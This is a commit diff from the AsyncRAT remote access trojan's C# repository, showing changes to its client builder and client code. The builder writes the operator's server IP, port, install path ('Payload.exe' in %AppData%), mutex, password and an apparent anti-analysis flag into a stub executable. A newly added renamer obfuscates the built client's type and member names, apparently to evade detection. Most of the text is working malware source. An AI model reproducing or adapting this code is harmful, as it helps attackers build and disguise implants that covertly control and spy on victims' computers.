Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-05-07 06:25:17 -07:00
parent 7684520c67
commit ddc8430b98
18 changed files with 349 additions and 146 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj
View File

@ -47,11 +47,10 @@
<SpecificVersion>False</SpecificVersion> <SpecificVersion>False</SpecificVersion>
<HintPath>Resources\cGeoIp.dll</HintPath> <HintPath>Resources\cGeoIp.dll</HintPath>
</Reference> </Reference>
<Reference Include="dnlib, Version=3.2.0.0, Culture=neutral, PublicKeyToken=50e96378b6e77999, processorArchitecture=MSIL">
<HintPath>..\packages\dnlib.3.2.0\lib\net45\dnlib.dll</HintPath>
<Private>True</Private>
</Reference>
<Reference Include="Microsoft.VisualBasic" /> <Reference Include="Microsoft.VisualBasic" />
<Reference Include="Mono.Cecil, Version=0.10.3.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
<HintPath>..\packages\Mono.Cecil.0.10.3\lib\net40\Mono.Cecil.dll</HintPath>
</Reference>
<Reference Include="System" /> <Reference Include="System" />
<Reference Include="System.Core" /> <Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" /> <Reference Include="System.Xml.Linq" />
@ -129,6 +128,7 @@
<Compile Include="Handle Packet\HandleThumbnails.cs" /> <Compile Include="Handle Packet\HandleThumbnails.cs" />
<Compile Include="Handle Packet\Packet.cs" /> <Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" /> <Compile Include="Handle Packet\HandleProcessManager.cs" />
<Compile Include="Helper\BuildRenamer.cs" />
<Compile Include="Helper\Methods.cs" /> <Compile Include="Helper\Methods.cs" />
<Compile Include="MessagePack\BytesTools.cs" /> <Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" /> <Compile Include="MessagePack\MsgPack.cs" />

7
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

@ -47,16 +47,13 @@ namespace AsyncRAT_Sharp
} }
if (!File.Exists(Path.Combine(Application.StartupPath, "cGeoIp.dll"))) if (!File.Exists(Path.Combine(Application.StartupPath, "cGeoIp.dll")))
File.WriteAllBytes(Path.Combine(Application.StartupPath, "cGeoIp.dll"), Properties.Resources.cGeoIp); MessageBox.Show("File 'cGeoIp.dll' Not Found!");
if (!File.Exists(Path.Combine(Application.StartupPath, "dnlib.dll")))
File.WriteAllBytes(Path.Combine(Application.StartupPath, "dnlib.dll"), Properties.Resources.dnlib);
if (!Directory.Exists(Path.Combine(Application.StartupPath, "Stub"))) if (!Directory.Exists(Path.Combine(Application.StartupPath, "Stub")))
Directory.CreateDirectory(Path.Combine(Application.StartupPath, "Stub")); Directory.CreateDirectory(Path.Combine(Application.StartupPath, "Stub"));
if (!File.Exists(Path.Combine(Application.StartupPath, "Stub\\Stub.exe"))) if (!File.Exists(Path.Combine(Application.StartupPath, "Stub\\Stub.exe")))
MessageBox.Show("Stub Not Found"); MessageBox.Show("Stub Not Found!");
} }
catch (Exception ex) catch (Exception ex)
{ {

152
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
View File

@ -1,10 +1,8 @@
using System; using System;
using System.Linq;
using System.Windows.Forms; using System.Windows.Forms;
using dnlib.DotNet; using Mono.Cecil;
using dnlib.DotNet.Emit; using AsyncRAT_Sharp.Helper;
using System.IO; using Mono.Cecil.Cil;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Forms namespace AsyncRAT_Sharp.Forms
{ {
@ -15,101 +13,48 @@ namespace AsyncRAT_Sharp.Forms
InitializeComponent(); InitializeComponent();
} }
private async void button1_Click(object sender, EventArgs e) private void button1_Click(object sender, EventArgs e)
{ {
if (string.IsNullOrWhiteSpace(textIP.Text) || string.IsNullOrWhiteSpace(textPort.Text)) return; if (string.IsNullOrWhiteSpace(textIP.Text) || string.IsNullOrWhiteSpace(textPort.Text)) return;
if (checkBox1.Checked) if (checkBox1.Checked)
{ {
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) return; if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) return;
if (!textFilename.Text.EndsWith("exe")) textFilename.Text += ".exe"; if (!textFilename.Text.EndsWith("exe")) textFilename.Text += ".exe";
} }
if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = Guid.NewGuid().ToString().Substring(10); if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = Guid.NewGuid().ToString().Substring(10);
try try
{ {
button1.Enabled = false; using (AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly(@"Stub/Stub.exe"))
var md = ModuleDefMD.Load(Path.Combine(Application.StartupPath, @"Stub\Stub.exe"));
foreach (TypeDef type in md.Types)
{ {
if (type.Name == "Settings") WriteSettings(asmDef);
foreach (MethodDef method in type.Methods)
{
if (method.Body == null) continue;
for (int i = 0; i < method.Body.Instructions.Count(); i++)
{
if (method.Body.Instructions[i].OpCode == OpCodes.Ldstr)
{
if (method.Body.Instructions[i].Operand.ToString() == "127.0.0.1")
method.Body.Instructions[i].Operand = textIP.Text;
if (method.Body.Instructions[i].Operand.ToString() == "6606") Renamer r = new Renamer(asmDef);
method.Body.Instructions[i].Operand = textPort.Text;
if (method.Body.Instructions[i].Operand.ToString() == "%AppData%") if (!r.Perform())
method.Body.Instructions[i].Operand = comboBoxFolder.Text; throw new Exception("renaming failed");
if (method.Body.Instructions[i].Operand.ToString() == "Payload.exe") // PHASE 3 - Saving
method.Body.Instructions[i].Operand = textFilename.Text; using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
if (method.Body.Instructions[i].Operand.ToString() == "false")
method.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
if (method.Body.Instructions[i].Operand.ToString() == "%Anti%")
method.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower();
if (method.Body.Instructions[i].Operand.ToString() == "%MTX%")
method.Body.Instructions[i].Operand = txtMutex.Text;
if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT")
method.Body.Instructions[i].Operand = Settings.Password;
}
}
}
}
SaveFileDialog saveFileDialog1 = new SaveFileDialog();
saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
saveFileDialog1.InitialDirectory = Application.StartupPath;
saveFileDialog1.OverwritePrompt = false;
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
bool isok = false; ;
await Task.Run(() =>
{ {
try saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
saveFileDialog1.InitialDirectory = Application.StartupPath;
saveFileDialog1.OverwritePrompt = false;
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{ {
md.Write(saveFileDialog1.FileName); r.AsmDef.Write(saveFileDialog1.FileName);
isok = true; MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
this.Close();
} }
catch (Exception ex)
{
MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
isok = false;
}
});
if (isok == true)
{
MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
Properties.Settings.Default.DNS = textIP.Text;
Properties.Settings.Default.Filename = textFilename.Text;
Properties.Settings.Default.Mutex = txtMutex.Text;
Properties.Settings.Default.Save();
button1.Enabled = true;
this.Close();
} }
else
button1.Enabled = true;
} }
else
button1.Enabled = true;
} }
catch (Exception ex) catch (Exception ex)
{ {
MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error); MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
button1.Enabled = true;
} }
} }
@ -144,5 +89,60 @@ namespace AsyncRAT_Sharp.Forms
if (Properties.Settings.Default.Mutex.Length > 0) if (Properties.Settings.Default.Mutex.Length > 0)
txtMutex.Text = Properties.Settings.Default.Mutex; txtMutex.Text = Properties.Settings.Default.Mutex;
} }
private void WriteSettings(AssemblyDefinition asmDef)
{
foreach (var typeDef in asmDef.Modules[0].Types)
{
if (typeDef.FullName == "Client.Settings")
{
foreach (var methodDef in typeDef.Methods)
{
if (methodDef.Name == ".cctor")
{
int strings = 1;
for (int i = 0; i < methodDef.Body.Instructions.Count; i++)
{
if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldstr) // string
{
switch (strings)
{
case 1: //port
methodDef.Body.Instructions[i].Operand = textPort.Text;
break;
case 2: //ip
methodDef.Body.Instructions[i].Operand = textIP.Text;
break;
case 3: //version
methodDef.Body.Instructions[i].Operand = Settings.Version;
break;
case 4: //install
methodDef.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
break;
case 5: //folder
methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text;
break;
case 6: //filename
methodDef.Body.Instructions[i].Operand = textFilename.Text;
break;
case 7: //password
methodDef.Body.Instructions[i].Operand = Settings.Password;
break;
case 8: //mutex
methodDef.Body.Instructions[i].Operand = txtMutex.Text;
break;
case 9: //anti
methodDef.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower();
break;
}
strings++;
}
}
}
}
}
}
}
} }
} }

7
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs
View File

@ -19,7 +19,12 @@ namespace AsyncRAT_Sharp.Handle_Packet
client.LV = new ListViewItem(); client.LV = new ListViewItem();
client.LV.Tag = client; client.LV.Tag = client;
client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]); client.LV.Text = string.Format("{0}:{1}", client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0], client.ClientSocket.LocalEndPoint.ToString().Split(':')[1]);
string[] ipinf = new cGeoMain().GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':'); string[] ipinf;
try
{
ipinf = new cGeoMain().GetIpInf(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
}
catch { ipinf = new string[] { "?", "?" }; }
client.LV.SubItems.Add(ipinf[1]); client.LV.SubItems.Add(ipinf[1]);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);

241
AsyncRAT-C#/AsyncRAT-Sharp/Helper/BuildRenamer.cs Normal file
View File

@ -0,0 +1,241 @@
using Mono.Cecil;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper
{
public class Renamer
{
/// <summary>
/// Contains the assembly definition.
/// </summary>
public AssemblyDefinition AsmDef { get; set; }
private int Length { get; set; }
private MemberOverloader _typeOverloader;
private Dictionary<TypeDefinition, MemberOverloader> _methodOverloaders;
private Dictionary<TypeDefinition, MemberOverloader> _fieldOverloaders;
private Dictionary<TypeDefinition, MemberOverloader> _eventOverloaders;
public Renamer(AssemblyDefinition asmDef)
: this(asmDef, 20)
{
}
public Renamer(AssemblyDefinition asmDef, int length)
{
this.AsmDef = asmDef;
this.Length = length;
_typeOverloader = new MemberOverloader(this.Length);
_methodOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
_fieldOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
_eventOverloaders = new Dictionary<TypeDefinition, MemberOverloader>();
}
/// <summary>
/// Attempts to modify the assembly definition data.
/// </summary>
/// <returns>True if the operation succeeded; False if the operation failed.</returns>
public bool Perform()
{
try
{
foreach (TypeDefinition typeDef in AsmDef.Modules.SelectMany(module => module.Types))
{
RenameInType(typeDef);
}
return true;
}
catch
{
return false;
}
}
private void RenameInType(TypeDefinition typeDef)
{
if (!typeDef.Namespace.StartsWith("Client") /* || typeDef.HasInterfaces */)
return;
_typeOverloader.GiveName(typeDef);
typeDef.Namespace = string.Empty;
MemberOverloader methodOverloader = GetMethodOverloader(typeDef);
MemberOverloader fieldOverloader = GetFieldOverloader(typeDef);
MemberOverloader eventOverloader = GetEventOverloader(typeDef);
if (typeDef.HasNestedTypes)
foreach (TypeDefinition nestedType in typeDef.NestedTypes)
RenameInType(nestedType);
if (typeDef.HasMethods)
foreach (MethodDefinition methodDef in
typeDef.Methods.Where(methodDef =>
!methodDef.IsConstructor && !methodDef.HasCustomAttributes &&
!methodDef.IsAbstract && !methodDef.IsVirtual))
methodOverloader.GiveName(methodDef);
if (typeDef.HasFields)
foreach (FieldDefinition fieldDef in typeDef.Fields)
fieldOverloader.GiveName(fieldDef);
if (typeDef.HasEvents)
foreach (EventDefinition eventDef in typeDef.Events)
eventOverloader.GiveName(eventDef);
}
private MemberOverloader GetMethodOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._methodOverloaders, typeDef);
}
private MemberOverloader GetFieldOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._fieldOverloaders, typeDef);
}
private MemberOverloader GetEventOverloader(TypeDefinition typeDef)
{
return GetOverloader(this._eventOverloaders, typeDef);
}
private MemberOverloader GetOverloader(Dictionary<TypeDefinition, MemberOverloader> overloaderDictionary,
TypeDefinition targetTypeDef)
{
MemberOverloader overloader;
if (!overloaderDictionary.TryGetValue(targetTypeDef, out overloader))
{
overloader = new MemberOverloader(this.Length);
overloaderDictionary.Add(targetTypeDef, overloader);
}
return overloader;
}
private class MemberOverloader
{
private bool DoRandom { get; set; }
private int StartingLength { get; set; }
private readonly Dictionary<string, string> _renamedMembers = new Dictionary<string, string>();
private readonly char[] _charMap;
private readonly SafeRandom _random = new SafeRandom();
private int[] _indices;
public MemberOverloader(int startingLength, bool doRandom = true)
: this(startingLength, doRandom, "ABCDEFGHIJKLMNOPQRSTUVWXYZ".ToLower().ToCharArray())
{
}
private MemberOverloader(int startingLength, bool doRandom, char[] chars)
{
this._charMap = chars;
this.DoRandom = doRandom;
this.StartingLength = startingLength;
this._indices = new int[startingLength];
}
public void GiveName(MemberReference member)
{
string currentName = GetCurrentName();
string originalName = member.ToString();
member.Name = currentName;
while (_renamedMembers.ContainsValue(member.ToString()))
{
member.Name = GetCurrentName();
}
_renamedMembers.Add(originalName, member.ToString());
}
private string GetCurrentName()
{
return DoRandom ? GetRandomName() : GetOverloadedName();
}
private string GetRandomName()
{
StringBuilder builder = new StringBuilder();
for (int i = 0; i < StartingLength; i++)
{
builder.Append((char)_random.Next(int.MinValue, int.MaxValue));
}
return builder.ToString();
}
private string GetOverloadedName()
{
IncrementIndices();
char[] chars = new char[_indices.Length];
for (int i = 0; i < _indices.Length; i++)
chars[i] = _charMap[_indices[i]];
return new string(chars);
}
private void IncrementIndices()
{
for (int i = _indices.Length - 1; i >= 0; i--)
{
_indices[i]++;
if (_indices[i] >= _charMap.Length)
{
if (i == 0)
Array.Resize(ref _indices, _indices.Length + 1);
_indices[i] = 0;
}
else
break;
}
}
}
}
public class SafeRandom
{
private static readonly RandomNumberGenerator GlobalCryptoProvider = RandomNumberGenerator.Create();
[ThreadStatic]
private static Random _random;
private static Random GetRandom()
{
if (_random == null)
{
byte[] buffer = new byte[4];
GlobalCryptoProvider.GetBytes(buffer);
_random = new Random(BitConverter.ToInt32(buffer, 0));
}
return _random;
}
public int Next()
{
return GetRandom().Next();
}
public int Next(int maxValue)
{
return GetRandom().Next(maxValue);
}
public int Next(int minValue, int maxValue)
{
return GetRandom().Next(minValue, maxValue);
}
public void NextBytes(byte[] buffer)
{
GetRandom().NextBytes(buffer);
}
public double NextDouble()
{
return GetRandom().NextDouble();
}
}
}

28
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs generated
View File

@ -81,12 +81,12 @@ namespace AsyncRAT_Sharp.Properties {
} }
/// <summary> /// <summary>
/// Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt; /// Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
///&lt;configuration&gt; ///&lt;configuration&gt;
/// &lt;configSections&gt; /// &lt;configSections&gt;
/// &lt;sectionGroup name=&quot;userSettings&quot; type=&quot;System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&quot; &gt; /// &lt;sectionGroup name=&quot;userSettings&quot; type=&quot;System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&quot;&gt;
/// &lt;section name=&quot;AsyncRAT_Sharp.Properties.Settings&quot; type=&quot;System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&quot; allowExeDefinition=&quot;MachineToLocalUser&quot; requirePermission=&quot;false&quot; /&gt; /// &lt;section name=&quot;AsyncRAT_Sharp.Properties.Settings&quot; type=&quot;System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&quot; allowExeDefinition=&quot;MachineToLocalUser&quot; requirePermission=&quot;false&quot;/&gt;
/// [rest of string was truncated]&quot;;. /// &lt;/s [rest of string was truncated]&quot;;.
/// </summary> /// </summary>
internal static string AsyncRAT_Sharp_exe { internal static string AsyncRAT_Sharp_exe {
get { get {
@ -114,16 +114,6 @@ namespace AsyncRAT_Sharp.Properties {
} }
} }
/// <summary>
/// Looks up a localized resource of type System.Byte[].
/// </summary>
internal static byte[] cGeoIp {
get {
object obj = ResourceManager.GetObject("cGeoIp", resourceCulture);
return ((byte[])(obj));
}
}
/// <summary> /// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap. /// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary> /// </summary>
@ -144,16 +134,6 @@ namespace AsyncRAT_Sharp.Properties {
} }
} }
/// <summary>
/// Looks up a localized resource of type System.Byte[].
/// </summary>
internal static byte[] dnlib {
get {
object obj = ResourceManager.GetObject("dnlib", resourceCulture);
return ((byte[])(obj));
}
}
/// <summary> /// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap. /// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary> /// </summary>

6
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
View File

@ -133,9 +133,6 @@
<data name="play-button" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="play-button" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="cGeoIp" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\cGeoIp.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="botkiller" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="botkiller" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
@ -154,9 +151,6 @@
<data name="arrow_down" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="arrow_down" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\arrow_down.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\arrow_down.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>
<data name="dnlib" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\dnlib.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="process" type="System.Resources.ResXFileRef, System.Windows.Forms"> <data name="process" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value> <value>..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data> </data>

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/dnlib.dll
View File

Binary file not shown.

2
AsyncRAT-C#/AsyncRAT-Sharp/packages.config
View File

@ -1,4 +1,4 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<packages> <packages>
<package id="dnlib" version="3.2.0" targetFramework="net45" /> <package id="Mono.Cecil" version="0.10.3" targetFramework="net46" />
</packages> </packages>

4
AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
View File

@ -1,7 +1,5 @@
using Client.MessagePack; using Client.MessagePack;
using Client.Sockets; using Client.Sockets;
using StreamLibrary;
using StreamLibrary.UnsafeCodecs;
using System.Drawing; using System.Drawing;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.IO; using System.IO;
@ -10,6 +8,8 @@ using System.Windows.Forms;
using System.Net.Sockets; using System.Net.Sockets;
using Client.Helper; using Client.Helper;
using System; using System;
using Client.StreamLibrary.UnsafeCodecs;
using Client.StreamLibrary;
namespace Client.Handle_Packet namespace Client.Handle_Packet
{ {

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -12,12 +12,12 @@ namespace Client
public static readonly string Install = "false"; public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static readonly string Password = "NYAN CAT"; public static readonly string Password = "NYAN CAT";
public static readonly Aes256 aes256 = new Aes256(Password);
public static readonly string MTX = "%MTX%"; public static readonly string MTX = "%MTX%";
#if DEBUG #if DEBUG
public static readonly string Anti = "false"; public static readonly string Anti = "false";
#else #else
public static readonly string Anti = "%Anti%"; public static readonly string Anti = "%Anti%";
#endif #endif
public static readonly Aes256 aes256 = new Aes256(Password);
} }
} }

6
AsyncRAT-C#/Client/StreamLibrary/Enums.cs
View File

@ -1,8 +1,4 @@
using System; namespace Client.StreamLibrary
using System.Collections.Generic;
using System.Text;
namespace StreamLibrary
{ {
public enum CodecOption public enum CodecOption
{ {

6
AsyncRAT-C#/Client/StreamLibrary/IUnsafeCodec.cs
View File

@ -1,12 +1,10 @@
using StreamLibrary.src; using Client.StreamLibrary.src;
using System; using System;
using System.Collections.Generic;
using System.Drawing; using System.Drawing;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.IO; using System.IO;
using System.Text;
namespace StreamLibrary namespace Client.StreamLibrary
{ {
public abstract class IUnsafeCodec public abstract class IUnsafeCodec
{ {

4
AsyncRAT-C#/Client/StreamLibrary/IVideoCodec.cs
View File

@ -1,11 +1,11 @@
using StreamLibrary.src; using Client.StreamLibrary.src;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Text; using System.Text;
namespace StreamLibrary namespace Client.StreamLibrary
{ {
public abstract class IVideoCodec public abstract class IVideoCodec
{ {

4
AsyncRAT-C#/Client/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
View File

@ -1,4 +1,4 @@
using StreamLibrary.src; using Client.StreamLibrary.src;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Drawing; using System.Drawing;
@ -6,7 +6,7 @@ using System.Drawing.Imaging;
using System.IO; using System.IO;
using System.Text; using System.Text;
namespace StreamLibrary.UnsafeCodecs namespace Client.StreamLibrary.UnsafeCodecs
{ {
public class UnsafeStreamCodec : IUnsafeCodec public class UnsafeStreamCodec : IUnsafeCodec
{ {

7
AsyncRAT-C#/Client/StreamLibrary/src/JpgCompression.cs
View File

@ -1,11 +1,8 @@
using System; using System.Drawing;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.IO; using System.IO;
using System.Text;
namespace StreamLibrary.src namespace Client.StreamLibrary.src
{ {
public class JpgCompression public class JpgCompression
{ {

7
AsyncRAT-C#/Client/StreamLibrary/src/LzwCompression.cs
View File

@ -1,11 +1,8 @@
using System; using System.Drawing;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.IO; using System.IO;
using System.Text;
namespace StreamLibrary.src namespace Client.StreamLibrary.src
{ {
public class LzwCompression public class LzwCompression
{ {

4
AsyncRAT-C#/Client/StreamLibrary/src/NativeMethods.cs
View File

@ -1,9 +1,7 @@
using System; using System;
using System.Collections.Generic;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.Text;
namespace StreamLibrary.src namespace Client.StreamLibrary.src
{ {
public class NativeMethods public class NativeMethods
{ {